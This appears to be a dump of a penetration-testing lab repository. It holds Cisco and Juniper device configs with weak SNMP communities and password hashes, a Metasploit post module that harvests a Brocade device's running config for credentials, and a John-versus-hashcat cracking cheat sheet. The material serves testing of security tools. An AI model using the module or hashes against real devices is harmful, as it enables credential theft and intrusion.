282 | access-list 1 remark SDM_ACL Category=2 283 | access-list 1 permit 10.1.1.0 0.0.0.255 284 | access-list 1 permit 192.168.10.0 0.0.0.255 285 | access-list 1 permit 10.1.10.0 0.0.0.3 286 | access-list 100 remark auto generated by SDM firewall configuration 287 | access-list 100 remark SDM_ACL Category=1 288 | access-list 100 deny ip 192.168.10.0 0.0.0.255 any 289 | access-list 100 deny ip host 255.255.255.255 any 290 | access-list 100 deny ip 127.0.0.0 0.255.255.255 any 291 | access-list 100 permit ip any any 292 | access-list 101 remark auto generated by SDM firewall configuration 293 | access-list 101 remark SDM_ACL Category=1 294 | access-list 101 permit tcp 10.1.1.0 0.0.0.255 eq 2000 any 295 | access-list 101 permit udp 10.1.1.0 0.0.0.255 eq 2000 any 296 | access-list 101 deny ip 192.168.10.0 0.0.0.255 any 297 | access-list 101 deny ip 10.1.1.0 0.0.0.255 any 298 | access-list 101 deny ip host 255.255.255.255 any 299 | access-list 101 deny ip 127.0.0.0 0.255.255.255 any 300 | access-list 101 permit ip any any 301 | access-list 102 remark auto generated by SDM firewall configuration 302 | access-list 102 remark SDM_ACL Category=1 303 | access-list 102 deny ip 10.1.10.0 0.0.0.3 any 304 | access-list 102 deny ip 10.1.1.0 0.0.0.255 any 305 | access-list 102 deny ip host 255.255.255.255 any 306 | access-list 102 deny ip 127.0.0.0 0.255.255.255 any 307 | access-list 102 permit ip any any 308 | access-list 103 remark auto generated by SDM firewall configuration 309 | access-list 103 remark SDM_ACL Category=1 310 | access-list 103 permit tcp 10.1.10.0 0.0.0.3 any eq 2000 311 | access-list 103 permit udp 10.1.10.0 0.0.0.3 any eq 2000 312 | access-list 103 permit udp any 10.1.10.0 0.0.0.3 range 16384 32767 313 | access-list 103 permit udp 10.1.10.0 0.0.0.3 range 16384 32767 any 314 | access-list 103 deny ip 192.168.10.0 0.0.0.255 any 315 | access-list 103 deny ip host 255.255.255.255 any 316 | access-list 103 deny ip 127.0.0.0 0.255.255.255 any 317 | access-list 103 
permit ip any any 318 | access-list 104 remark auto generated by SDM firewall configuration 319 | access-list 104 remark SDM_ACL Category=1 320 | access-list 104 deny ip 10.1.10.0 0.0.0.3 any 321 | access-list 104 deny ip 192.168.10.0 0.0.0.255 any 322 | access-list 104 deny ip 10.1.1.0 0.0.0.255 any 323 | access-list 104 permit udp any eq bootps any eq bootpc 324 | access-list 104 permit icmp any any echo-reply 325 | access-list 104 permit icmp any any time-exceeded 326 | access-list 104 permit icmp any any unreachable 327 | access-list 104 deny ip 10.0.0.0 0.255.255.255 any 328 | access-list 104 deny ip 172.16.0.0 0.15.255.255 any 329 | access-list 104 deny ip 192.168.0.0 0.0.255.255 any 330 | access-list 104 deny ip 127.0.0.0 0.255.255.255 any 331 | access-list 104 deny ip host 255.255.255.255 any 332 | access-list 104 deny ip any any 333 | access-list 104 permit tcp any any 334 | access-list 104 permit icmp any any 335 | access-list 104 permit ip any any 336 | snmp-server community public RO 337 | snmp-server community private RW 338 | ! 339 | ! 340 | ! 341 | ! 342 | ! 
343 | tftp-server flash:/phones/521_524/cp524g-8-1-17.bin alias cp524g-8-1-17.bin 344 | tftp-server flash:/phones/7931/apps31.9-1-1TH1-16.sbn alias apps31.9-1-1TH1-16.sbn 345 | tftp-server flash:/phones/7931/cnu31.9-1-1TH1-16.sbn alias cnu31.9-1-1TH1-16.sbn 346 | tftp-server flash:/phones/7931/cvm31sccp.9-1-1TH1-16.sbn alias cvm31sccp.9-1-1TH1-16.sbn 347 | tftp-server flash:/phones/7931/dsp31.9-1-1TH1-16.sbn alias dsp31.9-1-1TH1-16.sbn 348 | tftp-server flash:/phones/7931/jar31sccp.9-1-1TH1-16.sbn alias jar31sccp.9-1-1TH1-16.sbn 349 | tftp-server flash:/phones/7931/SCCP31.9-1-1SR1S.loads alias SCCP31.9-1-1SR1S.loads 350 | tftp-server flash:/phones/7931/term31.default.loads alias term31.default.loads 351 | tftp-server flash:/phones/7945_7965/apps45.9-1-1TH1-16.sbn alias apps45.9-1-1TH1-16.sbn 352 | tftp-server flash:/phones/7945_7965/cnu45.9-1-1TH1-16.sbn alias cnu45.9-1-1TH1-16.sbn 353 | tftp-server flash:/phones/7945_7965/cvm45sccp.9-1-1TH1-16.sbn alias cvm45sccp.9-1-1TH1-16.sbn 354 | tftp-server flash:/phones/7945_7965/dsp45.9-1-1TH1-16.sbn alias dsp45.9-1-1TH1-16.sbn 355 | tftp-server flash:/phones/7945_7965/jar45sccp.9-1-1TH1-16.sbn alias jar45sccp.9-1-1TH1-16.sbn 356 | tftp-server flash:/phones/7945_7965/SCCP45.9-1-1SR1S.loads alias SCCP45.9-1-1SR1S.loads 357 | tftp-server flash:/phones/7945_7965/term45.default.loads alias term45.default.loads 358 | tftp-server flash:/phones/7945_7965/term65.default.loads alias term65.default.loads 359 | tftp-server flash:/ringtones/Analog1.raw alias Analog1.raw 360 | tftp-server flash:/ringtones/Analog2.raw alias Analog2.raw 361 | tftp-server flash:/ringtones/AreYouThere.raw alias AreYouThere.raw 362 | tftp-server flash:/ringtones/DistinctiveRingList.xml alias DistinctiveRingList.xml 363 | tftp-server flash:/ringtones/RingList.xml alias RingList.xml 364 | tftp-server flash:/ringtones/AreYouThereF.raw alias AreYouThereF.raw 365 | tftp-server flash:/ringtones/Bass.raw alias Bass.raw 366 | tftp-server 
flash:/ringtones/CallBack.raw alias CallBack.raw 367 | tftp-server flash:/ringtones/Chime.raw alias Chime.raw 368 | tftp-server flash:/ringtones/Classic1.raw alias Classic1.raw 369 | tftp-server flash:/ringtones/Classic2.raw alias Classic2.raw 370 | tftp-server flash:/ringtones/ClockShop.raw alias ClockShop.raw 371 | tftp-server flash:/ringtones/Drums1.raw alias Drums1.raw 372 | tftp-server flash:/ringtones/Drums2.raw alias Drums2.raw 373 | tftp-server flash:/ringtones/FilmScore.raw alias FilmScore.raw 374 | tftp-server flash:/ringtones/HarpSynth.raw alias HarpSynth.raw 375 | tftp-server flash:/ringtones/Jamaica.raw alias Jamaica.raw 376 | tftp-server flash:/ringtones/KotoEffect.raw alias KotoEffect.raw 377 | tftp-server flash:/ringtones/MusicBox.raw alias MusicBox.raw 378 | tftp-server flash:/ringtones/Piano1.raw alias Piano1.raw 379 | tftp-server flash:/ringtones/Piano2.raw alias Piano2.raw 380 | tftp-server flash:/ringtones/Pop.raw alias Pop.raw 381 | tftp-server flash:/ringtones/Pulse1.raw alias Pulse1.raw 382 | tftp-server flash:/ringtones/Ring1.raw alias Ring1.raw 383 | tftp-server flash:/ringtones/Ring2.raw alias Ring2.raw 384 | tftp-server flash:/ringtones/Ring3.raw alias Ring3.raw 385 | tftp-server flash:/ringtones/Ring4.raw alias Ring4.raw 386 | tftp-server flash:/ringtones/Ring5.raw alias Ring5.raw 387 | tftp-server flash:/ringtones/Ring6.raw alias Ring6.raw 388 | tftp-server flash:/ringtones/Ring7.raw alias Ring7.raw 389 | tftp-server flash:/ringtones/Sax1.raw alias Sax1.raw 390 | tftp-server flash:/ringtones/Sax2.raw alias Sax2.raw 391 | tftp-server flash:/ringtones/Vibe.raw alias Vibe.raw 392 | tftp-server flash:/Desktops/CampusNight.png 393 | tftp-server flash:/Desktops/TN-CampusNight.png 394 | tftp-server flash:/Desktops/CiscoFountain.png 395 | tftp-server flash:/Desktops/TN-CiscoFountain.png 396 | tftp-server flash:/Desktops/CiscoLogo.png 397 | tftp-server flash:/Desktops/TN-CiscoLogo.png 398 | tftp-server flash:/Desktops/Fountain.png 399 | 
tftp-server flash:/Desktops/TN-Fountain.png 400 | tftp-server flash:/Desktops/MorroRock.png 401 | tftp-server flash:/Desktops/TN-MorroRock.png 402 | tftp-server flash:/Desktops/NantucketFlowers.png 403 | tftp-server flash:/Desktops/TN-NantucketFlowers.png 404 | tftp-server flash:Desktops/320x212x16/List.xml 405 | tftp-server flash:Desktops/320x212x12/List.xml 406 | tftp-server flash:Desktops/320x216x16/List.xml 407 | tftp-server flash:/bacdprompts/en_bacd_allagentsbusy.au alias en_bacd_allagentsbusy.au 408 | tftp-server flash:/bacdprompts/en_bacd_disconnect.au alias en_bacd_disconnect.au 409 | tftp-server flash:/bacdprompts/en_bacd_enter_dest.au alias en_bacd_enter_dest.au 410 | tftp-server flash:/bacdprompts/en_bacd_invalidoption.au alias en_bacd_invalidoption.au 411 | tftp-server flash:/bacdprompts/en_bacd_music_on_hold.au alias en_bacd_music_on_hold.au 412 | tftp-server flash:/bacdprompts/en_bacd_options_menu.au alias en_bacd_options_menu.au 413 | tftp-server flash:/bacdprompts/en_bacd_welcome.au alias en_bacd_welcome.au 414 | tftp-server flash:/bacdprompts/en_bacd_xferto_operator.au alias en_bacd_xferto_operator.au 415 | ! 416 | control-plane 417 | ! 418 | ! 419 | ! 420 | voice-port 0/0/0 421 | caller-id enable 422 | ! 423 | voice-port 0/0/1 424 | caller-id enable 425 | ! 426 | voice-port 0/0/2 427 | caller-id enable 428 | ! 429 | voice-port 0/0/3 430 | caller-id enable 431 | ! 432 | voice-port 0/1/0 433 | trunk-group ALL_FXO 64 434 | connection plar 201 435 | caller-id enable 436 | ! 437 | voice-port 0/1/1 438 | trunk-group ALL_FXO 64 439 | connection plar 202 440 | caller-id enable 441 | ! 442 | voice-port 0/1/2 443 | trunk-group ALL_FXO 64 444 | connection plar 203 445 | caller-id enable 446 | ! 447 | voice-port 0/1/3 448 | trunk-group ALL_FXO 64 449 | connection plar 204 450 | caller-id enable 451 | ! 452 | voice-port 0/4/0 453 | auto-cut-through 454 | signal immediate 455 | input gain auto-control -15 456 | description Music On Hold Port 457 | ! 
458 | sccp local Loopback0 459 | sccp ccm 10.1.1.1 identifier 1 460 | sccp 461 | ! 462 | sccp ccm group 1 463 | associate ccm 1 priority 1 464 | ! 465 | dial-peer cor custom 466 | name internal 467 | name local 468 | name local-plus 469 | name international 470 | name national 471 | name national-plus 472 | name emergency 473 | name toll-free 474 | ! 475 | ! 476 | dial-peer cor list call-internal 477 | member internal 478 | ! 479 | dial-peer cor list call-local 480 | member local 481 | ! 482 | dial-peer cor list call-local-plus 483 | member local-plus 484 | ! 485 | dial-peer cor list call-national 486 | member national 487 | ! 488 | dial-peer cor list call-national-plus 489 | member national-plus 490 | ! 491 | dial-peer cor list call-international 492 | member international 493 | ! 494 | dial-peer cor list call-emergency 495 | member emergency 496 | ! 497 | dial-peer cor list call-toll-free 498 | member toll-free 499 | ! 500 | dial-peer cor list user-internal 501 | member internal 502 | member emergency 503 | ! 504 | dial-peer cor list user-local 505 | member internal 506 | member local 507 | member emergency 508 | member toll-free 509 | ! 510 | dial-peer cor list user-local-plus 511 | member internal 512 | member local 513 | member local-plus 514 | member emergency 515 | member toll-free 516 | ! 517 | dial-peer cor list user-national 518 | member internal 519 | member local 520 | member local-plus 521 | member national 522 | member emergency 523 | member toll-free 524 | ! 525 | dial-peer cor list user-national-plus 526 | member internal 527 | member local 528 | member local-plus 529 | member national 530 | member national-plus 531 | member emergency 532 | member toll-free 533 | ! 534 | dial-peer cor list user-international 535 | member internal 536 | member local 537 | member local-plus 538 | member international 539 | member national 540 | member national-plus 541 | member emergency 542 | member toll-free 543 | ! 544 | ! 
545 | dial-peer voice 1 pots 546 | port 0/0/0 547 | no sip-register 548 | ! 549 | dial-peer voice 2 pots 550 | port 0/0/1 551 | no sip-register 552 | ! 553 | dial-peer voice 3 pots 554 | port 0/0/2 555 | no sip-register 556 | ! 557 | dial-peer voice 4 pots 558 | port 0/0/3 559 | no sip-register 560 | ! 561 | dial-peer voice 5 pots 562 | description ** MOH Port ** 563 | destination-pattern ABC 564 | port 0/4/0 565 | no sip-register 566 | ! 567 | dial-peer voice 6 pots 568 | description catch all dial peer for BRI/PRIv 569 | translation-profile incoming nondialable 570 | incoming called-number .% 571 | direct-inward-dial 572 | ! 573 | dial-peer voice 50 pots 574 | description ** incoming dial peer ** 575 | incoming called-number ^AAAA$ 576 | port 0/1/0 577 | ! 578 | dial-peer voice 51 pots 579 | description ** incoming dial peer ** 580 | incoming called-number ^AAAA$ 581 | port 0/1/1 582 | ! 583 | dial-peer voice 52 pots 584 | description ** incoming dial peer ** 585 | incoming called-number ^AAAA$ 586 | port 0/1/2 587 | ! 588 | dial-peer voice 53 pots 589 | description ** incoming dial peer ** 590 | incoming called-number ^AAAA$ 591 | port 0/1/3 592 | ! 593 | dial-peer voice 54 pots 594 | description ** FXO pots dial-peer ** 595 | destination-pattern A0 596 | port 0/1/0 597 | no sip-register 598 | ! 599 | dial-peer voice 55 pots 600 | description ** FXO pots dial-peer ** 601 | destination-pattern A1 602 | port 0/1/1 603 | no sip-register 604 | ! 605 | dial-peer voice 56 pots 606 | description ** FXO pots dial-peer ** 607 | destination-pattern A2 608 | port 0/1/2 609 | no sip-register 610 | ! 611 | dial-peer voice 57 pots 612 | description ** FXO pots dial-peer ** 613 | destination-pattern A3 614 | port 0/1/3 615 | no sip-register 616 | ! 
617 | dial-peer voice 2000 voip 618 | description ** cue voicemail pilot number ** 619 | destination-pattern 399 620 | b2bua 621 | voice-class sip outbound-proxy ipv4:10.1.10.1 622 | session protocol sipv2 623 | session target ipv4:10.1.10.1 624 | dtmf-relay rtp-nte 625 | codec g711ulaw 626 | no vad 627 | ! 628 | dial-peer voice 2001 voip 629 | dtmf-relay rtp-nte 630 | ! 631 | dial-peer voice 2012 voip 632 | dtmf-relay rtp-nte 633 | ! 634 | ! 635 | no dial-peer outbound status-check pots 636 | ! 637 | ! 638 | telephony-service 639 | video 640 | fxo hook-flash 641 | load 7931 SCCP31.9-1-1SR1S 642 | load 7945 SCCP45.9-1-1SR1S 643 | load 7965 SCCP45.9-1-1SR1S 644 | load 521G-524G cp524g-8-1-17 645 | max-ephones 14 646 | max-dn 56 647 | ip source-address 10.1.1.1 port 2000 648 | auto assign 1 to 1 type bri 649 | calling-number initiator 650 | service phone videoCapability 1 651 | service phone ehookenable 1 652 | service dnis overlay 653 | service dnis dir-lookup 654 | service dss 655 | timeouts interdigit 5 656 | system message UC520 657 | url services http://10.1.10.1/voiceview/common/login.do 658 | url authentication http://10.1.10.2/CCMCIP/authenticate.asp 659 | time-zone 5 660 | keepalive 30 auxiliary 4 661 | voicemail 399 662 | max-conferences 8 gain -6 663 | call-forward pattern .T 664 | call-forward system redirecting-expanded 665 | moh flash:/media/music-on-hold.au 666 | multicast moh 239.10.16.16 port 2000 667 | web admin system name cisco secret 5 $1$n/n0$q6wNrBypu0GDpxzfSwGnf1 668 | dn-webedit 669 | time-webedit 670 | transfer-system full-consult dss 671 | transfer-pattern 9.T 672 | transfer-pattern .T 673 | secondary-dialtone 9 674 | night-service day Sun 17:00 09:00 675 | night-service day Mon 17:00 09:00 676 | night-service day Tue 17:00 09:00 677 | night-service day Wed 17:00 09:00 678 | night-service day Thu 17:00 09:00 679 | night-service day Fri 17:00 09:00 680 | night-service day Sat 17:00 09:00 681 | fac standard 682 | create cnf-files 
version-stamp Jan 01 2002 00:00:00 683 | ! 684 | ! 685 | ephone-template 15 686 | url services 1 http://10.1.10.1/voiceview/common/login.do VoiceviewExpress 687 | softkeys remote-in-use Newcall 688 | softkeys idle Redial Newcall Cfwdall Pickup Gpickup Dnd Login 689 | softkeys seized Cfwdall Endcall Redial Pickup Gpickup Callback 690 | softkeys connected Hold Endcall Trnsfer Confrn Acct Park 691 | button-layout 7931 2 692 | ! 693 | ! 694 | ephone-template 16 695 | url services 1 http://10.1.10.1/voiceview/common/login.do VoiceviewExpress 696 | softkeys remote-in-use Newcall 697 | softkeys idle Redial Newcall Cfwdall Pickup Gpickup Dnd Login 698 | softkeys seized Cfwdall Endcall Redial Pickup Gpickup Callback 699 | softkeys connected Hold Endcall Trnsfer Confrn Acct Park 700 | ! 701 | ! 702 | ephone-template 17 703 | url services 1 http://10.1.10.1/voiceview/common/login.do VoiceviewExpress 704 | softkeys remote-in-use CBarge Newcall 705 | softkeys idle Redial Newcall Cfwdall Pickup Gpickup Dnd Login 706 | softkeys seized Cfwdall Endcall Redial Pickup Gpickup Callback 707 | softkeys connected Hold Endcall Trnsfer Confrn Acct Park 708 | ! 709 | ! 710 | ephone-template 18 711 | url services 1 http://10.1.10.1/voiceview/common/login.do VoiceviewExpress 712 | softkeys remote-in-use CBarge Newcall 713 | softkeys idle Redial Newcall Cfwdall Pickup Gpickup Dnd Login 714 | softkeys seized Cfwdall Endcall Redial Pickup Gpickup Callback 715 | softkeys connected Hold Endcall Trnsfer Confrn Acct Park 716 | button-layout 7931 2 717 | ! 718 | ! 719 | ephone-dn 1 720 | number 101 no-reg primary 721 | description IP-Paging1 722 | name Everyone 723 | paging ip 239.1.1.1 port 2000 724 | ! 725 | ! 726 | ephone-dn 9 727 | number BCD no-reg primary 728 | description MoH 729 | moh out-call ABC 730 | ! 731 | ! 732 | ephone-dn 49 733 | number A691 no-reg primary 734 | name phone three 735 | intercom A642 label "phonethree" 736 | ! 737 | ! 
738 | ephone-dn 50 739 | number A642 no-reg primary 740 | name phone two 741 | intercom A691 label "phontwo" 742 | ! 743 | ! 744 | ephone-dn 51 octo-line 745 | number 444 no-reg primary 746 | label 444 747 | name phone four 748 | call-forward busy 399 749 | call-forward noan 399 timeout 20 750 | ! 751 | ! 752 | ephone-dn 52 dual-line 753 | number 333 no-reg primary 754 | label 333 755 | name phone three 756 | ! 757 | ! 758 | ephone-dn 53 octo-line 759 | number 222 no-reg primary 760 | label 222 761 | name phone two 762 | call-forward busy 399 763 | call-forward noan 399 timeout 20 764 | ! 765 | ! 766 | ephone-dn 54 octo-line 767 | number 111 no-reg primary 768 | label 111 769 | name phone one 770 | call-forward busy 399 771 | call-forward noan 399 timeout 20 772 | ! 773 | ! 774 | ephone-dn 55 775 | number A801... no-reg primary 776 | mwi off 777 | ! 778 | ! 779 | ephone-dn 56 780 | number A800... no-reg primary 781 | mwi on 782 | ! 783 | ! 784 | ephone 1 785 | device-security-mode none 786 | mac-address 0023.331B.3188 787 | ephone-template 15 788 | username "phoneone" password 111111 789 | paging-dn 1 790 | codec g711ulaw 791 | type 7945 792 | button 1:54 793 | ! 794 | ! 795 | ! 796 | ephone 2 797 | device-security-mode none 798 | mac-address 001B.D53D.9D4D 799 | ephone-template 15 800 | username "phonetwo" password 222222 801 | speed-dial 1 101 label "Paging" 802 | paging-dn 1 803 | codec g711ulaw 804 | type 7931 805 | button 1:53 2m54 3m52 4m51 806 | button 5w54 6w52 7w51 8:50 807 | ! 808 | ! 809 | ! 810 | ephone 3 811 | device-security-mode none 812 | mac-address 001D.E5EA.9CD9 813 | ephone-template 16 814 | max-calls-per-button 2 815 | username "phonethree" password 333333 816 | paging-dn 1 817 | codec g711ulaw 818 | type 524G 819 | button 1:52 2:49 820 | ! 821 | ! 822 | ! 
823 | ephone 4 824 | device-security-mode none 825 | mac-address 0023.331B.7FCE 826 | ephone-template 16 827 | username "phonefour" password 444444 828 | paging-dn 1 829 | codec g711ulaw 830 | type 7945 831 | button 1:51 832 | ! 833 | ! 834 | banner login ^CCisco Configuration Assistant. Version: 3.1 (1). Sat Oct 06 14:18:08 EDT 2018^C 835 | alias exec cca_voice_mode PBX 836 | ! 837 | line con 0 838 | no modem enable 839 | line aux 0 840 | line 2 841 | no activation-character 842 | no exec 843 | transport preferred none 844 | transport input all 845 | line vty 0 4 846 | transport preferred none 847 | transport input ssh 848 | line vty 5 100 849 | transport preferred none 850 | transport input all 851 | ! 852 | ntp master 853 | end 854 |
--------------------------------------------------------------------------------
/coloradoftp-prime-8.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/fc1e874cce797a51035998fdde0f0dff39d7e6a4/coloradoftp-prime-8.zip

--------------------------------------------------------------------------------
/enum_brocade.rb:
--------------------------------------------------------------------------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'
# Provides cisco_ios_config_eater, which enum_priv calls on the running config
require 'msf/core/auxiliary/cisco'

class Metasploit3 < Msf::Post
  include Msf::Auxiliary::Cisco

  def initialize(info={})
    super( update_info( info,
      'Name'          => 'Brocade Gather Device General Information',
      'Description'   => %q{
        This module collects a Brocade device's information and configuration.
      },
      'License'       => MSF_LICENSE,
      'Author'        => [ 'h00die '],
      'SessionTypes'  => [ 'shell' ]
    ))

    register_options(
      [
        OptString.new('ENABLE_UN', [false, 'Enable username for changing privilege level.']),
        OptString.new('ENABLE_PASS', [false, 'Enable password for changing privilege level.'])
      ], self.class)

  end

  def run
    # Get device prompt
    prompt = session.shell_command("")

    # Set terminal length to 0 so no paging is required
    #session.shell_write("term len 0 \n")

    # Get version info
    print_status("Getting version information")
    show_ver_cmd = "show version"
    ver_out = session.shell_command(show_ver_cmd)
    # Named capture: ver["ver_no"] holds the text after "SW: Version "
    ver = ver_out.match(/SW: Version (?<ver_no>.*)\n/)
    # Fall back to "unknown" so a missing version line does not raise on nil
    ver_no = ver ? ver["ver_no"].strip : "unknown"
    #print_status(ver["ver_no"])

    # Get current privilege level
    #print_status("Getting privilege level")
    #priv_cmd = "show priv"
    #priv = (session.shell_command(priv_cmd)).scan(/privilege level is (\d*)/).join

    # Mark the OS
    os_type = "Brocade"
    os_loot = "brocade"
    # The prompt suffix tells the privilege level: ">" is user, "#" is enabled
    case prompt
    when />/
      mode = "User Level"
    when /#/
      mode = "Enabled"
    end

    print_status("The device OS is #{os_type} version #{ver_no}")
    #print_status("Session running in mode #{mode}")
    print_status("Privilege level #{mode}")

    ver_loc = store_loot("brocade.ios.version",
      "text/plain",
      session,
      ver_no,
      "version.txt", #?
      "Brocade Version")
    # Print the loot location if VERBOSE is set to true.
    vprint_status("version information stored in to loot, file:#{ver_loc}")

    # Enumerate depending on privilege level.
    # The string must match the value assigned to mode above ("Enabled").
    case mode
    when "Enabled"
      enum_exec(prompt)
      enum_priv(prompt)
    end
  end

  # Run enumeration commands for when privilege level is 7 or 15
  def enum_priv(prompt)
    host,port = session.session_host, session.session_port
    priv_commands = [
      {
        "cmd"  => "show running-config",
        "fn"   => "run_config",
        "desc" => "Brocade Device running configuration"
      },
      # {
      #   "cmd"  => "show cdp neigh",
      #   "fn"   => "cdp_neighbors",
      #   "desc" => "Cisco Device CDP Neighbors"
      # },
      {
        "cmd"  => "show lldp neighbors",
        "fn"   => "cdp_neighbors",
        "desc" => "Brocade Device LLDP Neighbors"
      }
    ]
    priv_commands.each do |ec|
      # Strip the echoed command and the prompt from the captured output
      cmd_out = session.shell_command(ec['cmd']).gsub(/#{ec['cmd']}|#{prompt}/,"")
      next if cmd_out =~ /Invalid input|%/
      print_status("Gathering info from #{ec['cmd']}")
      # Process configuration
      if ec['cmd'] =~/show run/
        print_status("Parsing running configuration for credentials and secrets...")
        cisco_ios_config_eater(host,port,cmd_out)
      end
      cmd_loc = store_loot("cisco.ios.#{ec['fn']}",
        "text/plain",
        session,
        cmd_out.strip,
        "#{ec['fn']}.txt",
        ec['desc'])
      vprint_status("Saving to #{cmd_loc}")
    end
  end

  # run commands found in exec mode under privilege 1
  def enum_exec(prompt)
    exec_commands = [
      {
        "cmd"  => "show ssh",
        "fn"   => "ssh_sessions",
        "desc" => "SSH Sessions on Cisco Device"
      },
      {
        "cmd"  => "show sessions",
        "fn"   => "telnet_sessions",
        "desc" => "Telnet Sessions on Cisco Device"
      },
      {
        "cmd"  => "show login",
        "fn"   => "login_settings",
        "desc" => "Login settings on Cisco Device"
      },
      {
        "cmd"  => "show ip interface brief",
        "fn"   => "interface_info",
        "desc" => "IP Enabled Interfaces on Cisco Device"
      },
      {
        "cmd"  => "show inventory",
        "fn"   => "hw_inventory",
        "desc" => "Hardware component inventory for Cisco Device"
      }]
    exec_commands.each do |ec|
      # Strip the echoed command and the prompt from the captured output
      cmd_out = session.shell_command(ec['cmd']).gsub(/#{ec['cmd']}|#{prompt}/,"")
      next if cmd_out =~ /Invalid input|%/
      print_status("Gathering info from #{ec['cmd']}")
      cmd_loc = store_loot("cisco.ios.#{ec['fn']}",
        "text/plain",
        session,
        cmd_out.strip,
        "#{ec['fn']}.txt",
        ec['desc'])
      vprint_status("Saving to #{cmd_loc}")
    end
  end
end

--------------------------------------------------------------------------------
/ipfire-2.15.i586-full-core82.iso:
--------------------------------------------------------------------------------
version https://git-lfs.github.com/spec/v1
oid sha256:e0c46eecbba6b6c8b56dc591884f5a2391784661b0d4f6bb491e3169eea17203
size 138412032

--------------------------------------------------------------------------------
/ipfire-2.19.x86_64-full-core100.iso:
--------------------------------------------------------------------------------
version https://git-lfs.github.com/spec/v1
oid sha256:2a44a95f99af3da7ec7728061ba40f9a0ea9ad3febafff0a5ef18a6e054857b3
size 166723584

--------------------------------------------------------------------------------
/john_vs_hashcat.md:
--------------------------------------------------------------------------------
# General Settings

| Description     | JtR            | hashcat           |
|-----------------|----------------|-------------------|
| session         | --session      | --session         |
| no logging      | --nolog        | --logfile-disable |
| config file     | --config       | (n/a)             |
| previous cracks | --pot          | --potfile-path    |
| type of hashes  | --format       | --hash-type       |
| wordlist        | --wordlist     | (last parameter)  |
| incremental     | --incremental  | --increment       |
| rules           | --rules        | --rules-file      |
| max run time    | --max-run-time | --runtime         |
| show results    | --show         | --show            |

# Hash Setting

| Hash               | JtR (`john --list=formats`) | hashcat (`hashcat -h`) |
|--------------------|-----------------------------|------------------------|
| des                | descrypt                    | 1500                   |
| md5 (crypt is $1$) | md5crypt                    | 500                    |
| sha1               |                             | 100                    |
| bsdi               | bsdicrypt                   | 12400                  |
| sha256             | sha256crypt                 | 7400                   |
| sha512             | sha512crypt                 | 1800                   |
| blowfish           | bcrypt                      | 3200                   |
| lanman             | lm                          | 3000                   |
| NTLM               | nt                          | 1000                   |
| mssql (05)         | mssql                       | 131                    |
| mssql12            | mssql12                     | 1731                   |
| mssql (2012/2014)  | mssql05                     | 132                    |
| oracle (10)        | oracle                      | 3100                   |
| oracle 11          | oracle11                    | 112                    |
| oracle 12          | oracle12c                   | 12300                  |
| postgres           | dynamic_1034                | 12                     |
| mysql              | mysql                       | 200                    |
| mysql-sha1         | mysql-sha1                  | 300                    |

--------------------------------------------------------------------------------
/juniper_ex2200.config:
--------------------------------------------------------------------------------
1 | show configuration 2 | ## Last commit: 2016-08-15 13:35:48 UTC by root 3 | version 12.3R7.7; 4 | system { 5 | host-name h00dieJuniperEx2200; 6 | root-authentication { 7 | encrypted-password "$1$pz9b1.fq$foo5r85Ql8mXdoRUe0C1E."; ## SECRET-DATA 8 | } 9 | login { 10 | user newuser { 11 | uid 2000; 12 | class super-user; 13 | authentication { 14 | encrypted-password "$1$rm8FaMFY$k4LFxqsVAiGO5tKqyO9jJ/"; ## SECRET-DATA 15 | } 16 | } 17 | user newuser2 { 18 | uid 2002; 19 | class operator; 20 | authentication { 21 | encrypted-password "$1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0"; ## SECRET-DATA 22 | } 23 | } 24 | user newuser3 { 25 | uid 2003; 26 | class read-only; 27 | authentication { 28 | encrypted-password "$1$1.YvKzUY$dcAj99KngGhFZTpxGjA93."; ## SECRET-DATA 29 | } 30 | } 31 | user newuser4 { 32 | uid 2004; 33 | class unauthorized; 34 | authentication { 35 | encrypted-password 
"$1$bdWYaqOE$z6oTSJS3p1R8CoNaos9Ce/"; ## SECRET-DATA 36 | } 37 | } 38 | } 39 | services { 40 | ssh { 41 | root-login allow; 42 | } 43 | web-management { 44 | http; 45 | } 46 | dhcp { 47 | traceoptions { 48 | file dhcp_logfile; 49 | level all; 50 | flag all; 51 | } 52 | pool 192.168.10.0/24 { 53 | address-range low 192.168.10.2 high 192.168.10.254; 54 | } 55 | } 56 | } 57 | syslog { 58 | user * { 59 | any emergency; 60 | } 61 | file messages { 62 | any notice; 63 | authorization info; 64 | } 65 | file interactive-commands { 66 | interactive-commands any; 67 | } 68 | } 69 | } 70 | chassis { 71 | alarm { 72 | management-ethernet { 73 | link-down ignore; 74 | } 75 | } 76 | auto-image-upgrade; 77 | } 78 | interfaces { 79 | ge-0/0/0 { 80 | unit 0 { 81 | family inet { 82 | address 192.168.1.3/32; 83 | } 84 | } 85 | } 86 | ge-0/0/1 { 87 | unit 0 { 88 | family inet { 89 | address 192.168.1.4/32; 90 | } 91 | } 92 | } 93 | ge-0/0/2 { 94 | unit 0 { 95 | family inet { 96 | address 192.168.1.5/24; 97 | } 98 | } 99 | } 100 | ge-0/0/3 { 101 | unit 0 { 102 | family ethernet-switching; 103 | } 104 | } 105 | ge-0/0/4 { 106 | unit 0 { 107 | family ethernet-switching; 108 | } 109 | } 110 | ge-0/0/5 { 111 | unit 0 { 112 | family ethernet-switching; 113 | } 114 | } 115 | ge-0/0/6 { 116 | unit 0 { 117 | family ethernet-switching; 118 | } 119 | } 120 | ge-0/0/7 { 121 | unit 0 { 122 | family ethernet-switching; 123 | } 124 | } 125 | ge-0/0/8 { 126 | unit 0 { 127 | family ethernet-switching; 128 | } 129 | } 130 | ge-0/0/9 { 131 | unit 0 { 132 | family ethernet-switching; 133 | } 134 | } 135 | ge-0/0/10 { 136 | unit 0 { 137 | family ethernet-switching; 138 | } 139 | } 140 | ge-0/0/11 { 141 | unit 0 { 142 | family ethernet-switching; 143 | } 144 | } 145 | ge-0/0/12 { 146 | unit 0 { 147 | family ethernet-switching; 148 | } 149 | } 150 | ge-0/0/13 { 151 | unit 0 { 152 | family ethernet-switching; 153 | } 154 | } 155 | ge-0/0/14 { 156 | unit 0 { 157 | family ethernet-switching; 158 | } 159 | } 
    ge-0/0/15 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/16 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/17 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/18 {
        unit 0 {
            family ethernet-switching;
        }
    }
